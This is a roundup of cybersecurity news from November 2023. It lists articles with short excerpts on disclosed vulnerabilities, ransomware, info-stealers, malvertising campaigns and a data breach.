9 November 2023
2023
10 new vulnerabilities disclosed by Talos, including use-after-free issue in Google Chrome
Jonathan Munshaw
https://blog.talosintelligence.com/vulnerability-roundup-sept-27-23/
Excerpt:
“Cisco Talos disclosed 10 vulnerabilities over the past two weeks affecting a range of software, including the popular Google Chrome web browser.
Attackers could exploit these vulnerabilities to carry out a variety of attacks, in some cases gaining the ability to execute remote code on the targeted machine.”
Overview of IoT threats in 2023
Vitaly Morgunov, Yaroslav Shmelev, Kaspersky Security Services And Kaspersky Ics Cert
https://securelist.com/iot-threat-report-2023/110644/
Excerpt:
“IoT devices (routers, cameras, NAS boxes, and smart home components) multiply every year. Statista portal predicts their number will exceed 29 billion by 2030. As connected device numbers increase, so does the need for protection against various threats. The first-ever large-scale malware attacks on IoT devices were recorded back in 2008, and their number has only been growing ever since. We conducted an analysis of the IoT threat landscape for 2023, as well as the products and services offered on the dark web related to hacking connected devices. This report contains the key findings of our research.”
Microsoft Uncovers Flaws in ncurses Library Affecting Linux and macOS Systems
THN
https://thehackernews.com/2023/09/microsoft-uncovers-flaws-in-ncurses.html?&web_view=true
Excerpt:
“A set of memory corruption flaws have been discovered in the ncurses (short for new curses) programming library that could be exploited by threat actors to run malicious code on vulnerable Linux and macOS systems.”
Redline and Vidar Stealers Abuse EV Certificates, Deploy Ransomware
https://cyware.com/news/redline-and-vidar-stealers-abuse-ev-certificates-deploy-ransomware-8d46fdbc
Excerpt:
“A recent investigation by Trend Micro indicates that the threat groups operating RedLine and Vidar have started using the same methods to deliver ransomware as they do to distribute the info-stealers.”
Windows 11 ‘ThemeBleed’ RCE bug gets proof-of-concept exploit
Bill Toulas
Excerpt:
“Proof-of-concept exploit code has been published for a Windows Themes vulnerability tracked as CVE-2023-38146 that allows remote attackers to execute code.
The security issue is also referred to as ThemeBleed, and received a high-severity score of 8.8. It can be exploited if the target user opens a malicious .THEME file crafted by the attack.”
3AM: New Ransomware Family Used As Fallback in Failed LockBit Attack
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/3am-ransomware-lockbit
Excerpt:
“A new ransomware family calling itself 3AM has emerged. To date, the ransomware has only been used in a limited fashion. Symantec’s Threat Hunter Team, part of Broadcom, has seen it used in a single attack by a ransomware affiliate that attempted to deploy LockBit on a target’s network and then switched to 3AM when LockBit was blocked.”
New MidgeDropper Variant
James Slaughter and Shunichi Imano
https://www.fortinet.com/blog/threat-research/new-midgedropper-variant
Excerpt:
One of the most exciting aspects of malware analysis is coming across a family that is new or rare to the reversing community. Determining the function of the malware, who created it, and the reasons behind it become a mystery to solve. The previously unseen dropper variant we recently found, named MidgeDropper, has a complex infection chain that includes code obfuscation and sideloading, making it an interesting use case. Although we couldn’t obtain the final payload, this blog will still explore what makes this dropper tick.”
BatLoader Unleashed in Ongoing Webex Malvertising Campaign
https://cyware.com/news/batloader-unleashed-in-ongoing-webex-malvertising-campaign-774b17f8
Excerpt:
“A recent malvertising campaign has been found focusing on corporate users who are downloading the widely used web conferencing application, Webex. In this campaign, malicious actors have purchased an advertisement that mimics Cisco's branding, and it appears as the top result when conducting a Google search”
Malware distributor Storm-0324 facilitates ransomware access
Microsoft Threat Intelligence
Excerpt:
“The threat actor that Microsoft tracks as Storm-0324 is a financially motivated group known to gain initial access using email-based initial infection vectors and then hand off access to compromised networks to other threat actors. These handoffs frequently lead to ransomware deployment. Beginning in July 2023, Storm-0324 was observed distributing payloads using an open-source tool to send phishing lures through Microsoft Teams chats. This activity is not related to the Midnight Blizzard social engineering campaigns over Teams that we observed beginning in May 2023. Because Storm-0324 hands off access to other threat actors, identifying and remediating Storm-0324 activity can prevent more dangerous follow-on attacks like ransomware.”
Chrome extensions can steal plaintext passwords from websites
Bill Toulas
Excerpt:
“A team of researchers from the University of Wisconsin-Madison has uploaded to the Chrome Web Store a proof-of-concept extension that can steal plaintext passwords from a website's source code.
An examination of the text input fields in web browsers revealed that the coarse-grained permission model underpinning Chrome extensions violates the principles of least privilege and complete mediation.”
Analyzing a Facebook Profile Stealer Written in Node.js
Jaromir Horejsi
Excerpt:
“During our previous analysis of a campaign involving a Facebook stealer, we discovered another interesting stealer. It was written in Node.js, packaged into an executable, exfiltrated stolen data via both Telegram bot API and a command-and-control (C&C) server, and employed GraphQL as a channel for C&C communication. This blog entry investigates this new stealer and provides an in-depth analysis of its routines and capabilities.”
Vietnamese Cybercriminals Targeting Facebook Business Accounts with Malvertising
THN
https://thehackernews.com/2023/09/vietnamese-cybercriminals-targeting.html?&web_view=true
Excerpt:
“Malicious actors associated with the Vietnamese cybercrime ecosystem are leveraging advertising-as-a-vector on social media platforms such as Meta-owned Facebook to distribute malware.”
Freecycle users told to change passwords after data breach
Graham Cluley
https://grahamcluley.com/freecycle-users-told-to-change-passwords-after-data-breach/?web_view=true
Excerpt:
“Freecycle, an online community that encourages sharing unwanted items with eachother than chucking them in the bin or taking them to landfill, has told users to change their passwords after it suffered a data breach.”
New Agent Tesla Variant Being Spread by Crafted Excel Document
Xiaopeng Zhang
https://www.fortinet.com/blog/threat-research/agent-tesla-variant-spread-by-crafted-excel-document
Excerpt:
“Our FortiGuard Labs captured a phishing campaign that spreads a new Agent Tesla variant. This well-known malware family uses a .Net-based Remote Access Trojan (RAT) and data stealer to gain initial access. It is often used for Malware-as-a-Service (MaaS).”